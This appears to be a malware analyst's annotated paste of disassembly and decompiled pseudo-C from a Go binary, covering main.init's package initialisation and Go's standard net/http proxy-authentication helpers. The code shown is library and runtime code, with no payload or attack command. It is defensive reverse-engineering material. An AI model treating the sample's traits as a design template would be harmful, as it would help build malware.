<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a25</span> &nbsp; &nbsp; &nbsp;e896e8ddff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a2a</span> &nbsp; &nbsp; &nbsp;0f0b &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ud2</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a23</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;`<span class="co1">--&gt; 0x00648a2c &nbsp; &nbsp; &nbsp;c60541a91f00. &nbsp;mov byte [obj.main.initdone.], 1 &nbsp; &nbsp;; [0x843374:1]=0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a33</span> &nbsp; &nbsp; &nbsp;e8d837e9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a38</span> &nbsp; &nbsp; &nbsp;e82310e7ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>fmt<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a3d</span> &nbsp; &nbsp; &nbsp;e89e48e9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>math_rand<span class="sy0">.</span>init &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">4</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a42</span> &nbsp; &nbsp; &nbsp;e8896becff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>net<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">5</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a47</span> &nbsp; &nbsp; &nbsp;e804bcfcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_network<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">6</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a4c</span> &nbsp; &nbsp; &nbsp;e8efdde4ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">7</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a51</span> &nbsp; &nbsp; &nbsp;e86ad3fcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>init &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a56</span> &nbsp; &nbsp; &nbsp;e8e51ce9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">9</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a5b</span> &nbsp; &nbsp; &nbsp;e8b02cfdff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_scheduler<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a60</span> &nbsp; &nbsp; &nbsp;e8cbd8e1ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a65</span> &nbsp; &nbsp; &nbsp;e8b6afe7ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>strings<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a6a</span> &nbsp; &nbsp; &nbsp;e80172e3ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a6f</span> &nbsp; &nbsp; &nbsp;e83c6ee4ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a74</span> &nbsp; &nbsp; &nbsp;e857d7ffff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a79</span> &nbsp; &nbsp; &nbsp;e8f2e6ffff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a7e</span> &nbsp; &nbsp; &nbsp;c605efa81f00<span class="sy0">.</span> &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp;<span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843374</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a85</span> &nbsp; &nbsp; &nbsp;488b2c24 &nbsp; &nbsp; &nbsp; mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a89</span> &nbsp; &nbsp; &nbsp;4883c408 &nbsp; &nbsp; &nbsp; add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8d</span> &nbsp; &nbsp; &nbsp;c3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ret</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<!-- Decompiler pseudo-C for what appears to be the body of sym.main.init (the function header is not part of this excerpt); the call sequence matches the sym.main.init disassembly earlier in this paste.
     obj.main.initdone. acts as a three-state guard: 0 = not started, 1 = initialisation in progress, 2 = finished.
     The init calls list the packages the program imports: Go standard library (fmt, math/rand, net, os, os/signal, path/filepath, strconv, strings, syscall, time) plus the app_vendor_* packages (configur, network, scheduler, worker, github.com/satori/go.uuid). The app_vendor_* ones are not standard library, so they outline the sample's own module layout.
     NOTE(review): this initdone guard looks like the package-init code emitted by Go toolchains before 1.13; treat that as a hint only and confirm against the binary's build metadata. -->
<!-- Any state above 1 (already initialised): nothing to do. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="nu0">1</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>uint8_t<span class="br0">&#41;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<!-- State 1 means init was entered again while still running: runtime.throwinit is called, and the ud2 that follows it in the disassembly is rendered here as invalidInstructionException. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">==</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; invalidInstructionException<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">while</span><span class="br0">&#40;</span> <span class="kw4">true</span> <span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<!-- Mark "in progress" (0x1), run the init of each imported package in order, then mark "finished" (0x2) at the end. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>fmt<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>math_rand<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>net<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_network<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_scheduler<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strings<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x2</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
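<li class="li1"><div class="de1"><span class="sy0">//</span> proxy supported: the listings below show Go's stock net/http proxy helpers (ProxyFromEnvironment, ProxyURL, useProxy, proxyAuth) linked into the binary. These typically come with any Go program that imports net/http, so their presence alone does not prove that the sample's own HTTP client goes through a proxy; check how its Transport is built to confirm.</div></li>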
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005f8bc0</span> &nbsp; <span class="nu0">42</span> <span class="nu0">1298</span> &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyFromEnvironment</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005f90e0</span> &nbsp; &nbsp;<span class="nu0">6</span> <span class="nu0">141</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyURL</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fad00</span> &nbsp; &nbsp;<span class="nu0">7</span> <span class="nu0">248</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005ffa30</span> &nbsp; <span class="nu0">67</span> <span class="nu0">1631</span> &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>useProxy</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00607600</span> &nbsp; &nbsp;<span class="nu0">1</span> <span class="nu0">28</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyURL<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9788ea</span> <span class="nu0">36</span> <span class="nu0">35</span> net<span class="sy0">/</span>http<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>connectMethod<span class="br0">&#41;</span><span class="sy0">.</span>proxyAuth</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x97961f</span> <span class="nu0">18</span> <span class="nu0">17</span> net<span class="sy0">/</span>http<span class="sy0">.</span>useProxy</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x97b757</span> <span class="nu0">24</span> <span class="nu0">23</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyURL<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dbc43</span> <span class="nu0">22</span> <span class="nu0">21</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dbc6d</span> <span class="nu0">23</span> <span class="nu0">22</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpsProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dc038</span> <span class="nu0">20</span> <span class="nu0">19</span> net<span class="sy0">/</span>http<span class="sy0">.</span>noProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x768d</span> &nbsp; <span class="nu0">22</span> <span class="nu0">21</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x76a3</span> &nbsp; <span class="nu0">23</span> <span class="nu0">22</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpsProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x78de</span> &nbsp; <span class="nu0">20</span> <span class="nu0">19</span> net<span class="sy0">/</span>http<span class="sy0">.</span>noProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x2e857</span> &nbsp;<span class="nu0">30</span> <span class="nu0">29</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyFromEnvironment</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x2e875</span> &nbsp;<span class="nu0">18</span> <span class="nu0">17</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyURL</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<!-- Ghidra-style decompiler pseudo-C (undefined8, in_stack_*, extraout_RDX and BADSPACEBASE are decompiler artefacts) for net/http.(*connectMethod).proxyAuth. The symbol belongs to Go's standard net/http package, so this is library code linked into the sample rather than logic written by the malware author.
     The void return type and the empty argument lists of the inner calls should not be trusted: the disassembly header further down this page shows three stack arguments (arg_8h, arg_10h, arg_18h), and values passed or returned on the stack are not modelled here.
     NOTE(review): upstream Go implements proxyAuth as: return "" when there is no proxy URL or it carries no user info, otherwise return "Basic " + basicAuth(user, password) for the Proxy-Authorization header. The two nested null checks and the basicAuth + concatstring2 calls below are consistent with that; the 0x20 offset is presumably the User field of url.URL (confirm against the Go version used to build the sample). -->
<li class="li1"><div class="de1">void sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth<span class="br0">&#40;</span>undefined8 param_1<span class="sy0">,</span> undefined8 param_2<span class="sy0">,</span> int64_t param_3<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; uint64_t <span class="sy0">*</span>puVar1<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t in_FS_OFFSET<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t <span class="sy0">*</span>in_stack_00000008<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 in_stack_00000010<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 in_stack_00000018<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<!-- Go stack-growth prologue, not part of the function's logic: the stack pointer is compared with a limit read through the FS-relative thread-local pointer, and runtime.morestack_noctxt is called while the stack is too small. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">while</span> <span class="br0">&#40;</span>puVar1 <span class="sy0">=</span> <span class="br0">&#40;</span>uint64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span>in_FS_OFFSET <span class="sy0">+</span> <span class="nu0">0xfffffff8</span><span class="br0">&#41;</span> <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#41;</span><span class="sy0">,</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1 || <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">==</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt<span class="br0">&#40;</span>param_1<span class="sy0">,</span> param_2<span class="sy0">,</span> param_3<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; param_3 <span class="sy0">=</span> extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<!-- in_stack_00000008 is the first stack argument (arg_8h in the disassembly header): continue only if the pointer it holds is non-null. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="sy0">*</span>in_stack_00000008 !<span class="sy0">=</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<!-- Second check: the field at offset 0x20 of that object must also be non-null. -->
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span>in_stack_00000008 <span class="sy0">+</span> <span class="nu0">0x20</span><span class="br0">&#41;</span> !<span class="sy0">=</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<!-- Only on this path is a credential string built: basicAuth is called and concatstring2 joins two strings (operands are not shown by the decompiler). -->
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>basicAuth<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>concatstring2<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth @ <span class="nu0">0x5fadf3</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span> CALL XREFS from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__Transport_<span class="sy0">.</span>dialConn @ <span class="nu0">0x5fe1b1</span><span class="sy0">,</span> <span class="nu0">0x5ff325</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span><span class="co1">-- sym.go.net_http.__connectMethod_.proxyAuth:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">248</span><span class="sy0">:</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth <span class="br0">&#40;</span>int64_t arg_8h<span class="sy0">,</span> int64_t arg_10h<span class="sy0">,</span> int64_t arg_18h<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">10</span> <span class="br0">&#40;</span>vars <span class="nu0">7</span><span class="sy0">,</span> args <span class="nu0">3</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fad00</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fad09</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x005fad0d</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x5fadee</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fad13</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x40</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
